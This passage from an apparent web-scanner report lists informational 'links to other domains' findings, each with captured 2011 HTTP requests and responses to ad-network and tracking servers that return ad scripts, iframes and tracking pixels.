GET /if?enc=VgQNJ3Vfzj_hehSuR-HKPwAAAMDMzPQ_gL81A54syz82VmKelbTOPwrjFbNuftsOcEeI8W8QIllB_IhOAAAAAE1ECABlAQAAAgQAAAIAAAB-9gkAPWQAAAAAAABVU0QAVVNEACwB-gD8AdsEjAgBAgUCAQQAAAAA4CIHNQAAAAA.&pubclick=http://bid.openx.net/click?cd%3DH4sIAAAAAAAAABXLsQ0CMQwF0H8coEi3Bq2lxE7iuKBgAXYgOKkZg60Yg2Uo0L3-bVgAXKTVpxsP4qSdsotSlyZklrVr9tEKBxzu799tw7qPXvpwYaboedJsNdIswygli9rY1GsJOAJ6DThh-T4CzsDrgz_96owTcwAAAA%3D%3D%26dst%3D&tt_code=goal.com&udj=uf%28%27a%27%2C+27755%2C+1317600321%29%3Buf%28%27c%27%2C+125959%2C+1317600321%29%3Buf%28%27r%27%2C+652926%2C+1317600321%29%3Bppv%2817492%2C+%271070588350346683146%27%2C+1317600321%2C+1317859521%2C+125959%2C+25661%2C+0%29%3Bppv%2817492%2C+%271070588350346683146%27%2C+1317600321%2C+1317859521%2C+125959%2C+25661%2C+0%29%3B&cnd=!1h8O6giH2AcQ_uwnGAAgvcgBMAE4_ANAAEiCCFAAWABgeGgAcAJ4DIABAogBDJABAZgBAaABAqgBA7ABALkBDD4-AZa0zj_BAQw-PgGWtM4_yQHNzMzMzMz0P9kBAAAAAAAA8D_gAQA.&ccd=!TgVpKwiH2AcQ_uwnGL3IASAA&referrer=http://www.goal.com&media_subtypes=1 HTTP/1.1
Host: ib.adnxs.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: icu=ChIIrIsBEAoYASABKAEwwfGD8wQQwfGD8wQYAA..; anj=Kfu=8fG5EfE:3F.0s]#%2L_'x%SEV/i#-?R!z6Ut0QkM9e5'Qr*vP.V*lpYBPp[Bs3dBED7@8!MMT@<SGb]bp@OWFe]M3^!WeuSpp!<tk0xzCgSDb'W7Qc:sp!-ewEI]-`k1+Uxk1GOGkI/$_.v=_!`4hTmV3oY`#EoW=LnXT`HX)Ny^rF?u'>@*e?CDQ!(G@]1BW0Q<EQU#3!ZR*?l7/tm%40RO-2NpM_ZlEy!<e/e+ztxA; uuid2=-1

Response

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Expires: Sat, 15 Nov 2008 16:00:00 GMT
P3P: policyref="http://cdn.adnxs.com/w3c/policy/p3p.xml", CP="NOI DSP COR ADM PSAo PSDo OUR SAMo UNRo OTRo BUS COM NAV DEM STA PRE"
Set-Cookie: uuid2=-1; path=/; expires=Mon, 20-Sep-2021 00:05:22 GMT; domain=.adnxs.com; HttpOnly
Content-Type: text/html; charset=utf-8
Date: Mon, 03 Oct 2011 00:05:22 GMT
Content-Length: 633

<script language="javascript" src="http://www.inadcoads.com/script.ashx?pczid=269ccbc6-3ea2-4863-8eb1-67f59498f8ce&click_url=http://ib.adnxs.com/click?VgQNJ3Vfzj_hehSuR-HKPwAAAMDMzPQ_gL81A54syz82VmKelbTOPwrjFbNuftsOcEeI8W8QIllB_IhOAAAAAE1ECABlAQAAAgQAAAIAAAB-9gkAPWQAAAAAAABVU0QAVVNEACwB-gD8AdsEjAgDAQUCAQQAAAAA4SIaNQAAAAA./cnd=!TgVpKwiH2AcQ_uwnGL3IASAA/referrer=http%3A%2F%2Fwww.goal.com/clickenc=http%3A%2F%2Fbid.openx.net%2Fclick%3Fcd%3DH4sIAAAAAAAAABXLsQ0CMQwF0H8coEi3Bq2lxE7iuKBgAXYgOKkZg60Yg2Uo0L3-bVgAXKTVpxsP4qSdsotSlyZklrVr9tEKBxzu799tw7qPXvpwYaboedJsNdIswygli9rY1GsJOAJ6DThh-T4CzsDrgz_96owTcwAAAA%3D%3D%26dst%3D">
</script>
19.149. http://ib.adnxs.com/seg  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ib.adnxs.com
Path:   /seg

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /seg?add=155746&redir=&t=1 HTTP/1.1
Host: ib.adnxs.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-0666653885873574&output=html&h=250&slotname=7372794801&w=300&ea=0&flash=10.3.183&url=http%3A%2F%2Fads.pubmatic.com%2Fhosteddefaulttags%2F26620%2F26621%2F21556%2F559%2Fadtag.html&dt=1317606797018&bpp=7&shv=r20110921&jsv=r20110914&correlator=1317606797027&frm=8&adk=4114293891&ga_vid=1069027809.1317606797&ga_sid=1317606797&ga_hid=1887245699&ga_fc=0&u_tz=-300&u_his=8&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=23&u_nmime=106&dff=times%20new%20roman&dfs=16&adx=0&ady=0&biw=-12245933&bih=-12245933&ifk=2019610879&loc=http%3A%2F%2Fads.pubmatic.com%2FHostedDefaultTags%2F26620%2F26621%2F21556%2F559%2Fadtag.html&prodhost=googleads.g.doubleclick.net&fu=0&ifi=1&dtd=12
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: icu=ChIIrIsBEAoYASABKAEwwfGD8wQQwfGD8wQYAA..; anj=Kfu=8fG5EfE:3F.0s]#%2L_'x%SEV/i#-?R!z6Ut0QkM9e5'Qr*vP.V*lpYBPp[Bs3dBED7@8!MMT@<SGb]bp@OWFe]M3^!WeuSpp!<tk0xzCgSDb'W7Qc:sp!-ewEI]-`k1+Uxk1GOGkI/$_.v=_!`4hTmV3oY`#EoW=LnXT`HX)Ny^rF?u'>@*e?CDQ!(G@]1BW0Q<EQU#3!ZR*?l7/tm%40RO-2NpM_ZlEy!<e/e+ztxA; uuid2=-1

Response

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Expires: Sat, 15 Nov 2008 16:00:00 GMT
P3P: policyref="http://cdn.adnxs.com/w3c/policy/p3p.xml", CP="NOI DSP COR ADM PSAo PSDo OURo SAMo UNRo OTRo BUS COM NAV DEM STA PRE"
Set-Cookie: uuid2=-1; path=/; expires=Mon, 20-Sep-2021 01:53:21 GMT; domain=.adnxs.com; HttpOnly
Content-Type: text/javascript
Date: Mon, 03 Oct 2011 01:53:21 GMT
Content-Length: 360

document.write('<img src="http://ad.doubleclick.net/activity;src=2055485;dcnet=4845;boom=52987;sz=1x1;ord=1?" width="1" height="1"/>');document.write('<img src="http://b.scorecardresearch.com/b?c1=8&c2=6035145&c3=4845000000000000003&c4=&c5=&c6=&c15=&cv=1.3&cj=1" width="1" height="1"/>');document.write('<scr'+'ipt type="text/javascript" src="">
...[SNIP]...
19.150. http://ib.adnxs.com/ttj  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ib.adnxs.com
Path:   /ttj

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /ttj?id=449861&size=300x250&pfm=1&tlfs=ch&tmen=ch&tphv=ch&rtg=ga&brw=cr3&os=wn7&prm=0&efo=0&position=above&uatRandNo=65268&ad_type=ad&section=1782250&ad_size=300x250&cb=1918079288 HTTP/1.1
Host: ib.adnxs.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://d.tradex.openx.com/afr.php?zoneid=6391&cb=INSERT_RANDOM_NUMBER_HERE
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: icu=ChIIrIsBEAoYASABKAEwwfGD8wQQwfGD8wQYAA..; anj=Kfu=8fG5EfE:3F.0s]#%2L_'x%SEV/i#-?R!z6Ut0QkM9e5'Qr*vP.V*lpYBPp[Bs3dBED7@8!MMT@<SGb]bp@OWFe]M3^!WeuSpp!<tk0xzCgSDb'W7Qc:sp!-ewEI]-`k1+Uxk1GOGkI/$_.v=_!`4hTmV3oY`#EoW=LnXT`HX)Ny^rF?u'>@*e?CDQ!(G@]1BW0Q<EQU#3!ZR*?l7/tm%40RO-2NpM_ZlEy!<e/e+ztxA; uuid2=-1

Response

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Expires: Sat, 15 Nov 2008 16:00:00 GMT
P3P: policyref="http://cdn.adnxs.com/w3c/policy/p3p.xml", CP="NOI DSP COR ADM PSAo PSDo OURo SAMo UNRo OTRo BUS COM NAV DEM STA PRE"
Set-Cookie: uuid2=-1; path=/; expires=Sun, 19-Sep-2021 23:52:53 GMT; domain=.adnxs.com; HttpOnly
Content-Type: text/javascript
Date: Sun, 02 Oct 2011 23:52:53 GMT
Content-Length: 230

displayAds();document.write('<iframe src="http://view.atdmt.com/iaction/adoapn_AppNexusDemoActionTag_1" width="1" height="1" frameborder="0" scrolling="No" marginheight="0" marginwidth="0" topmargin="0" leftmargin="0"></iframe>
...[SNIP]...
19.151. http://int.teracent.net/tase/int  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://int.teracent.net
Path:   /tase/int

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /tase/int?adv=270&fmt=html&sec=0&pid=search&dest=1643195 HTTP/1.1
Host: int.teracent.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://fls.doubleclick.net/activityi;src=3057879;type=searc451;cat=searc443;u1=US;u12=109368;u13=324884;u14=255157;u15=1643195;u16=04%2F10%2F11-07%2F10%2F11;u18=2;ord=53963720?
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: uid=N9CZDAH.Q7IPoP; act=a$305#1315313311294_68374606_as3101_clk!1315313297486_68372787_as3103_imp!|; imp=a$le#1317384286603_272223897_ap3103_int|374#1316278116134_138322589_as3104_imp|308#1316265127233_137611811_as3107_imp|305#1315313297486_68372787_as3103_imp|; p161r=b$u-32#A.8Gx|g-yWB#1.8Gx|; p441r=b$u-21#5.8Pr|i-2870764#1.8Pr|

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: p270r=b$u-7#A.8Qp|i-1643195#2.8Qp|; Domain=.teracent.net; Expires=Sat, 31-Mar-2012 00:10:24 GMT; Path=/
Set-Cookie: imp=a$le#1317600624289_282559054_ap3100_int|374#1316278116134_138322589_as3104_imp|308#1316265127233_137611811_as3107_imp|305#1315313297486_68372787_as3103_imp|; Domain=.teracent.net; Expires=Sat, 31-Mar-2012 00:10:24 GMT; Path=/tase
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Expires: Sat, 6 May 1995 12:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html;charset=UTF-8
Content-Length: 352
Date: Mon, 03 Oct 2011 00:10:23 GMT
Connection: close

<html><head></head><body>
<img src="http://bp.specificclick.net?pixid=99013083" width="1" height="1" /><img src="http://ads.bluelithium.com/pixel?id=1027970&t=2" width="1" height="1" /><img src="http://leadback.advertising.com/adcedge/lb?site=695501&srvc=1&betr=hotelsca_cs=1&betq=11310=420915" width = "1" height = "1" border = "0"></body>
...[SNIP]...
19.152. http://o-va1.wtp101.com/imp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://o-va1.wtp101.com
Path:   /imp

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /imp?bc=CgVvcGVueBIkMjg5MjMxMGQtNDYwYS00Y2UzLWJjMjYtNDNhMDhkZmQ1YTcxIW3yiNFWl-A.KAowowU47amfhAdAxPVVSgczMDB4MjUwWhNodHRwOi8vd3d3LmdvYWwuY29tYghnb2FsLmNvbXoA-gEkYjViZWQzMjItMGQ0Zi1mODYwLWY1ZTktMTE5MDc4Mjk3ZDY1gAKNjQSIAhmQAtoT2gMNNTAuMjMuMTIzLjEwNuIDAlVT6gMCVFjwA-8E-gMGRGFsbGFzggQAigQCZW6SBAJlbpoEak1vemlsbGEvNS4wIChXaW5kb3dzIE5UIDYuMTsgV09XNjQpIEFwcGxlV2ViS2l0LzUzNS4xIChLSFRNTCwgbGlrZSBHZWNrbykgQ2hyb21lLzE0LjAuODM1LjE4NyBTYWZhcmkvNTM1LjGiBAZDaHJvbWWyBCQ5NDY5N2IzZi00YThlLWU4ZmQtNTZkMi1lNDI4MGU2ZWIyNTK6BCRmOWJkY2E2OS1lNjA5LTQyOTctOTE0NS00OGVhNTZhMDc1NmPpBH1GFLMK6OU.8QT8HNVps3f8P.gEAIAFAYIHB1dpbmRvd3M=&prc=AAABMscfG0LluyTuhmTAJwT3iYRqhyPr7vh5Cg HTTP/1.1
Host: o-va1.wtp101.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s=!1762!3105!2445!1731; opvc=!3919,CgVvcGVueBIkMmQ3NDZmNTAtNmY5Yi00NmZiLWJlZmItNmM1YjNmYzNmYzAwIW3yiNFWl-A.KAowowU47amfhAdAxPVVSgczMDB4MjUwWhNodHRwOi8vd3d3LmdvYWwuY29tYghnb2FsLmNvbXoA-gEkYjViZWQzMjItMGQ0Zi1mODYwLWY1ZTktMTE5MDc4Mjk3ZDY1gAKNjQSIAhmQAtoT2gMNNTAuMjMuMTIzLjEwNuIDAlVT6gMCVFjwA-8E-gMGRGFsbGFzggQAigQCZW6SBAJlbpoEak1vemlsbGEvNS4wIChXaW5kb3dzIE5UIDYuMTsgV09XNjQpIEFwcGxlV2ViS2l0LzUzNS4xIChLSFRNTCwgbGlrZSBHZWNrbykgQ2hyb21lLzE0LjAuODM1LjE4NyBTYWZhcmkvNTM1LjGiBAZDaHJvbWWyBCQ5NDY5N2IzZi00YThlLWU4ZmQtNTZkMi1lNDI4MGU2ZWIyNTK6BCRmOWJkY2E2OS1lNjA5LTQyOTctOTE0NS00OGVhNTZhMDc1NmPpBAAAAAAAAAAA8QQAAAAAAAAAAPgEAIAFAYIHB1dpbmRvd3M#,1317600201; pvmap=!3919,1317600201,ova3; tuuid=f9bdca69-e609-4297-9145-48ea56a0756c

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Mon, 03 Oct 2011 00:12:58 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
P3P: CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
Set-Cookie: tuuid=f9bdca69-e609-4297-9145-48ea56a0756c; path=/; expires=Wed, 02 Oct 2013 00:12:58 GMT; domain=.wtp101.com
Set-Cookie: opvc=!3919,CgVvcGVueBIkMjg5MjMxMGQtNDYwYS00Y2UzLWJjMjYtNDNhMDhkZmQ1YTcxIW3yiNFWl-A.KAowowU47amfhAdAxPVVSgczMDB4MjUwWhNodHRwOi8vd3d3LmdvYWwuY29tYghnb2FsLmNvbXoA-gEkYjViZWQzMjItMGQ0Zi1mODYwLWY1ZTktMTE5MDc4Mjk3ZDY1gAKNjQSIAhmQAtoT2gMNNTAuMjMuMTIzLjEwNuIDAlVT6gMCVFjwA-8E-gMGRGFsbGFzggQAigQCZW6SBAJlbpoEak1vemlsbGEvNS4wIChXaW5kb3dzIE5UIDYuMTsgV09XNjQpIEFwcGxlV2ViS2l0LzUzNS4xIChLSFRNTCwgbGlrZSBHZWNrbykgQ2hyb21lLzE0LjAuODM1LjE4NyBTYWZhcmkvNTM1LjGiBAZDaHJvbWWyBCQ5NDY5N2IzZi00YThlLWU4ZmQtNTZkMi1lNDI4MGU2ZWIyNTK6BCRmOWJkY2E2OS1lNjA5LTQyOTctOTE0NS00OGVhNTZhMDc1NmPpBH1GFLMK6OU.8QT8HNVps3f8P.gEAIAFAYIHB1dpbmRvd3M#,1317600778; path=/; expires=Wed, 02 Oct 2013 00:12:58 GMT; domain=.wtp101.com
Set-Cookie: pvmap=!3919,1317600778,ova!3919,1317600740,ova!3919,1317600698,ova!3919,1317600201,ova3; path=/; expires=Wed, 02 Oct 2013 00:12:58 GMT; domain=.wtp101.com
Cache-Control: no-cache, no-store, must-revalidate
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Pragma: no-cache
Content-Length: 3709

<html><body><iframe SRC="http://fw.adsafeprotected.com/rjsi/dc/10625/165711/adi/N5282.161249.ADNETIK.COM/B5256632.283;sz=300x250;pc=[TPAS_ID];click0=http://o-va1.wtp101.com/click?bc=CgVvcGVueBIkMjg5MjMxMGQtNDYwYS00Y2UzLWJjMjYtNDNhMDhkZmQ1YTcxIW3yiNFWl-A.KAowowU47amfhAdAxPVVSgczMDB4MjUwWhNodHRwOi8vd3d3LmdvYWwuY29tYghnb2FsLmNvbXoA-gEkYjViZWQzMjItMGQ0Zi1mODYwLWY1ZTktMTE5MDc4Mjk3ZDY1gAKNjQSIAhmQAtoT2gMNNTAuMjMuMTIzLjEwNuIDAlVT6gMCVFjwA-8E-gMGRGFsbGFzggQAigQCZW6SBAJlbpoEak1vemlsbGEvNS4wIChXaW5kb3dzIE5UIDYuMTsgV09XNjQpIEFwcGxlV2ViS2l0LzUzNS4xIChLSFRNTCwgbGlrZSBHZWNrbykgQ2hyb21lLzE0LjAuODM1LjE4NyBTYWZhcmkvNTM1LjGiBAZDaHJvbWWyBCQ5NDY5N2IzZi00YThlLWU4ZmQtNTZkMi1lNDI4MGU2ZWIyNTK6BCRmOWJkY2E2OS1lNjA5LTQyOTctOTE0NS00OGVhNTZhMDc1NmPgBADpBH1GFLMK6OU.8QT8HNVps3f8P.gEAIAFAYIHB1dpbmRvd3M%3D&redir=;ord=1089883246?" WIDTH=300 HEIGHT=250 MARGINWIDTH=0 MARGINHEIGHT=0 HSPACE=0 VSPACE=0 FRAMEBORDER=0 SCROLLING=no BORDERCOLOR='#000000'>
<script language='JavaScript1.1' SRC="http://fw.adsafeprotected.com/rjss/dc/10625/165712/adj/N5282.161249.ADNETIK.COM/B5256632.283;abr=!ie;sz=300x250;pc=[TPAS_ID];click0=http://o-va1.wtp101.com/click?bc=CgVvcGVueBIkMjg5MjMxMGQtNDYwYS00Y2UzLWJjMjYtNDNhMDhkZmQ1YTcxIW3yiNFWl-A.KAowowU47amfhAdAxPVVSgczMDB4MjUwWhNodHRwOi8vd3d3LmdvYWwuY29tYghnb2FsLmNvbXoA-gEkYjViZWQzMjItMGQ0Zi1mODYwLWY1ZTktMTE5MDc4Mjk3ZDY1gAKNjQSIAhmQAtoT2gMNNTAuMjMuMTIzLjEwNuIDAlVT6gMCVFjwA-8E-gMGRGFsbGFzggQAigQCZW6SBAJlbpoEak1vemlsbGEvNS4wIChXaW5kb3dzIE5UIDYuMTsgV09XNjQpIEFwcGxlV2ViS2l0LzUzNS4xIChLSFRNTCwgbGlrZSBHZWNrbykgQ2hyb21lLzE0LjAuODM1LjE4NyBTYWZhcmkvNTM1LjGiBAZDaHJvbWWyBCQ5NDY5N2IzZi00YThlLWU4ZmQtNTZkMi1lNDI4MGU2ZWIyNTK6BCRmOWJkY2E2OS1lNjA5LTQyOTctOTE0NS00OGVhNTZhMDc1NmPgBADpBH1GFLMK6OU.8QT8HNVps3f8P.gEAIAFAYIHB1dpbmRvd3M%3D&redir=;ord=1089883246?">
</SCRIPT>
...[SNIP]...
TZhMDc1NmPgBADpBH1GFLMK6OU.8QT8HNVps3f8P.gEAIAFAYIHB1dpbmRvd3M%3D&redir=http://ad.doubleclick.net/jump/N5282.161249.ADNETIK.COM/B5256632.283;abr=!ie4;abr=!ie5;sz=300x250;pc=[TPAS_ID];ord=1089883246?">
<IMG SRC="http://fw.adsafeprotected.com/rfw/dc/10625/165710/ad/N5282.161249.ADNETIK.COM/B5256632.283;abr=!ie4;abr=!ie5;sz=300x250;pc=[TPAS_ID];ord=1089883246?" BORDER=0 WIDTH=300 HEIGHT=250 ALT="Advertisement"></A>
...[SNIP]...
<noscript><img style="margin:0;padding:0;" border="0" width="1" height="1" src="http://l.betrad.com/ct/0_0_0_0_0_1220/pixel.gif?e=100&v=noscript"/></noscript>
...[SNIP]...
19.153. http://o-va1.wtp101.com/imp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://o-va1.wtp101.com
Path:   /imp

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /imp?bc=CgVvcGVueBIkNWI0YWUwODktMDVhYi00NWQ4LWJmMDMtZDcwNmM0YzJkZjM0IW3yiNFWl-A.KAowowU47amfhAdAxPVVSgczMDB4MjUwWhNodHRwOi8vd3d3LmdvYWwuY29tYghnb2FsLmNvbXoA-gEkYjViZWQzMjItMGQ0Zi1mODYwLWY1ZTktMTE5MDc4Mjk3ZDY1gAKNjQSIAhmQAtoT2gMNNTAuMjMuMTIzLjEwNuIDAlVT6gMCVFjwA-8E-gMGRGFsbGFzggQAigQCZW6SBAJlbpoEak1vemlsbGEvNS4wIChXaW5kb3dzIE5UIDYuMTsgV09XNjQpIEFwcGxlV2ViS2l0LzUzNS4xIChLSFRNTCwgbGlrZSBHZWNrbykgQ2hyb21lLzE0LjAuODM1LjE4NyBTYWZhcmkvNTM1LjGiBAZDaHJvbWWyBCQ5NDY5N2IzZi00YThlLWU4ZmQtNTZkMi1lNDI4MGU2ZWIyNTK6BCRmOWJkY2E2OS1lNjA5LTQyOTctOTE0NS00OGVhNTZhMDc1NmPpBHFzRlFVHvA.8QRYkXmDBvL-P.gEAIAFAYIHB1dpbmRvd3M=&prc=AAABMscfv78GHyKVns_3jj9bHHoO7pP3Bj44Sw HTTP/1.1
Host: o-va1.wtp101.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s=!1762!3105!2445!1731; opvc=!3919,CgVvcGVueBIkMjg5MjMxMGQtNDYwYS00Y2UzLWJjMjYtNDNhMDhkZmQ1YTcxIW3yiNFWl-A.KAowowU47amfhAdAxPVVSgczMDB4MjUwWhNodHRwOi8vd3d3LmdvYWwuY29tYghnb2FsLmNvbXoA-gEkYjViZWQzMjItMGQ0Zi1mODYwLWY1ZTktMTE5MDc4Mjk3ZDY1gAKNjQSIAhmQAtoT2gMNNTAuMjMuMTIzLjEwNuIDAlVT6gMCVFjwA-8E-gMGRGFsbGFzggQAigQCZW6SBAJlbpoEak1vemlsbGEvNS4wIChXaW5kb3dzIE5UIDYuMTsgV09XNjQpIEFwcGxlV2ViS2l0LzUzNS4xIChLSFRNTCwgbGlrZSBHZWNrbykgQ2hyb21lLzE0LjAuODM1LjE4NyBTYWZhcmkvNTM1LjGiBAZDaHJvbWWyBCQ5NDY5N2IzZi00YThlLWU4ZmQtNTZkMi1lNDI4MGU2ZWIyNTK6BCRmOWJkY2E2OS1lNjA5LTQyOTctOTE0NS00OGVhNTZhMDc1NmPpBH1GFLMK6OU.8QT8HNVps3f8P.gEAIAFAYIHB1dpbmRvd3M#,1317600698; pvmap=!3919,1317600698,ova!3919,1317600201,ova3; synclock=full; tuuid=f9bdca69-e609-4297-9145-48ea56a0756c

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Mon, 03 Oct 2011 00:13:31 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
P3P: CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
Set-Cookie: tuuid=d22326de-7542-4e09-8630-c6943c0e5308; path=/; expires=Wed, 02 Oct 2013 00:13:31 GMT; domain=.wtp101.com
Set-Cookie: opvc=!3919,CgVvcGVueBIkNWI0YWUwODktMDVhYi00NWQ4LWJmMDMtZDcwNmM0YzJkZjM0IW3yiNFWl-A.KAowowU47amfhAdAxPVVSgczMDB4MjUwWhNodHRwOi8vd3d3LmdvYWwuY29tYghnb2FsLmNvbXoA-gEkYjViZWQzMjItMGQ0Zi1mODYwLWY1ZTktMTE5MDc4Mjk3ZDY1gAKNjQSIAhmQAtoT2gMNNTAuMjMuMTIzLjEwNuIDAlVT6gMCVFjwA-8E-gMGRGFsbGFzggQAigQCZW6SBAJlbpoEak1vemlsbGEvNS4wIChXaW5kb3dzIE5UIDYuMTsgV09XNjQpIEFwcGxlV2ViS2l0LzUzNS4xIChLSFRNTCwgbGlrZSBHZWNrbykgQ2hyb21lLzE0LjAuODM1LjE4NyBTYWZhcmkvNTM1LjGiBAZDaHJvbWWyBCQ5NDY5N2IzZi00YThlLWU4ZmQtNTZkMi1lNDI4MGU2ZWIyNTK6BCRmOWJkY2E2OS1lNjA5LTQyOTctOTE0NS00OGVhNTZhMDc1NmPpBHFzRlFVHvA.8QRYkXmDBvL-P.gEAIAFAYIHB1dpbmRvd3M#,1317600811; path=/; expires=Wed, 02 Oct 2013 00:13:31 GMT; domain=.wtp101.com
Set-Cookie: pvmap=!3919,1317600811,ova!3919,1317600797,ova!3919,1317600796,ova!3919,1317600795,ova!3919,1317600791,ova!3919,1317600784,ova!3919,1317600201,ova3d0469776442fe78d28ed2840; path=/; expires=Wed, 02 Oct 2013 00:13:31 GMT; domain=.wtp101.com
Cache-Control: no-cache, no-store, must-revalidate
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Pragma: no-cache
Content-Length: 3709

<html><body><iframe SRC="http://fw.adsafeprotected.com/rjsi/dc/10625/165711/adi/N5282.161249.ADNETIK.COM/B5256632.283;sz=300x250;pc=[TPAS_ID];click0=http://o-va1.wtp101.com/click?bc=CgVvcGVueBIkNWI0YWUwODktMDVhYi00NWQ4LWJmMDMtZDcwNmM0YzJkZjM0IW3yiNFWl-A.KAowowU47amfhAdAxPVVSgczMDB4MjUwWhNodHRwOi8vd3d3LmdvYWwuY29tYghnb2FsLmNvbXoA-gEkYjViZWQzMjItMGQ0Zi1mODYwLWY1ZTktMTE5MDc4Mjk3ZDY1gAKNjQSIAhmQAtoT2gMNNTAuMjMuMTIzLjEwNuIDAlVT6gMCVFjwA-8E-gMGRGFsbGFzggQAigQCZW6SBAJlbpoEak1vemlsbGEvNS4wIChXaW5kb3dzIE5UIDYuMTsgV09XNjQpIEFwcGxlV2ViS2l0LzUzNS4xIChLSFRNTCwgbGlrZSBHZWNrbykgQ2hyb21lLzE0LjAuODM1LjE4NyBTYWZhcmkvNTM1LjGiBAZDaHJvbWWyBCQ5NDY5N2IzZi00YThlLWU4ZmQtNTZkMi1lNDI4MGU2ZWIyNTK6BCRmOWJkY2E2OS1lNjA5LTQyOTctOTE0NS00OGVhNTZhMDc1NmPgBADpBHFzRlFVHvA.8QRYkXmDBvL-P.gEAIAFAYIHB1dpbmRvd3M%3D&redir=;ord=1239357571?" WIDTH=300 HEIGHT=250 MARGINWIDTH=0 MARGINHEIGHT=0 HSPACE=0 VSPACE=0 FRAMEBORDER=0 SCROLLING=no BORDERCOLOR='#000000'>
<script language='JavaScript1.1' SRC="http://fw.adsafeprotected.com/rjss/dc/10625/165712/adj/N5282.161249.ADNETIK.COM/B5256632.283;abr=!ie;sz=300x250;pc=[TPAS_ID];click0=http://o-va1.wtp101.com/click?bc=CgVvcGVueBIkNWI0YWUwODktMDVhYi00NWQ4LWJmMDMtZDcwNmM0YzJkZjM0IW3yiNFWl-A.KAowowU47amfhAdAxPVVSgczMDB4MjUwWhNodHRwOi8vd3d3LmdvYWwuY29tYghnb2FsLmNvbXoA-gEkYjViZWQzMjItMGQ0Zi1mODYwLWY1ZTktMTE5MDc4Mjk3ZDY1gAKNjQSIAhmQAtoT2gMNNTAuMjMuMTIzLjEwNuIDAlVT6gMCVFjwA-8E-gMGRGFsbGFzggQAigQCZW6SBAJlbpoEak1vemlsbGEvNS4wIChXaW5kb3dzIE5UIDYuMTsgV09XNjQpIEFwcGxlV2ViS2l0LzUzNS4xIChLSFRNTCwgbGlrZSBHZWNrbykgQ2hyb21lLzE0LjAuODM1LjE4NyBTYWZhcmkvNTM1LjGiBAZDaHJvbWWyBCQ5NDY5N2IzZi00YThlLWU4ZmQtNTZkMi1lNDI4MGU2ZWIyNTK6BCRmOWJkY2E2OS1lNjA5LTQyOTctOTE0NS00OGVhNTZhMDc1NmPgBADpBHFzRlFVHvA.8QRYkXmDBvL-P.gEAIAFAYIHB1dpbmRvd3M%3D&redir=;ord=1239357571?">
